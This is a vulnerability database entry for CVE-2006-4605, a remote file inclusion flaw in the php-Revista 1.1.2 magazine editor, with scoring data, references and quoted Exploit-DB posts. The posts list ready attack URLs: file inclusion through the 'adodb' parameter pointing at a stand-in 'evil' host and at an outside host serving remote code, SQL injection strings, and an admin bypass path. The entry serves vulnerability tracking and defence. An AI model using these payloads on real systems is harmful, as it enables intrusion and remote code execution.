CVE-2006-4605
Published 2006-09-07
Priority: P3 42 · Severity: high · CVSS 2.0 base score: 7.5
CVSS 2.0 vector: AV:N/AC:L/Au:N/C:P/I:P/A:P
Exploit: available
EPSS: 3.83% (88.8th percentile)
PHP remote file inclusion vulnerability in index.php in Longino Jacome php-Revista 1.1.2 allows remote attackers to execute arbitrary PHP code via the adodb parameter.
Affected (1 range)
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| longino | jacome_php-revista | — | — |
No detection rules found.
Exploit-DB
PHP-revista 1.1.2 - Remote File Inclusion / SQL Injection / Authentication Bypass / Cross-Site Scripting (exploitdb, 2009-04-14; indexed under CVE-2006-4608)
---
Discovered by Sirdarckcat from elhacker.net
Revista 1.1.2
http://php-revista.sourceforge.org
Revista is a simple Spanish PHP magazine editor.
It was done by php.org.mx.
It suffers from multiple vulnerabilities.
Remote File Inclusion
http://revista/estilo/[ANY STYLE]/index.php?adodb=http://evil/script
SQLi
http://revista/estilo/[ANY STYLE]/busqueda_tema.php?id_temas=-1+[SQL]
http://revista/estilo/[ANY STYLE]/busqueda.php?cadena='+[SQL]
http://revista/estilo/[ANY STYLE]/autor.php?id_autor=-1+[SQL]
http://revista/estilo/[ANY STYLE]/lista.php?email='+[SQL]
http://revista/estilo/[ANY STYLE]/articulo.php?id_articulo=-1+[SQL]
Credentials Bypass
http://revista/admin/index
Exploit-DB
PHP-revista 1.1.2 - 'adodb' Multiple Remote File Inclusions (exploitdb, 2006-12-03; CVE-2006-4605)
---
--------------------------------------|| Viva Palestine ||-----------------------------------------
--------------------------------------|| Free Saddam Hussien ||-----------------------------------------
php-revista execute("$obten_rev");
$id_revista = $obten->fields["id"];
Exploit:
Http://www.Victem.0/[php-revista_PaTH]/estilo/Digital_Multiplex/index.php?adodb=http://4azhar.com/soft.txt?
Http://www.Victem.0/[php-revista_PaTH]/estilo/discreet/index.php?adodb=http://4azhar.com/soft.txt?
Http://www.Victem.0/[php-revista_PaTH]/estilo/galveston/index.php?adodb=http://4azhar.com/soft.txt?
Http://www.Victem.0/[php-revista_PaTH]/estilo/mergedidea/index.php?adodb=http://4azhar.com/soft.txt?
Http://www.Victem.0/[php-revista_Pa
No writeups or analysis indexed.
References:
- http://secunia.com/advisories/21738
- http://securityreason.com/securityalert/1499
- http://www.attrition.org/pipermail/vim/2009-April/002167.html
- http://www.osvdb.org/28443
- http://www.securityfocus.com/archive/1/445007/100/0/threaded
- http://www.securityfocus.com/archive/1/502637/100/0/threaded
- http://www.securityfocus.com/bid/19818
- https://www.exploit-db.com/exploits/8425
Published: 2006-09-07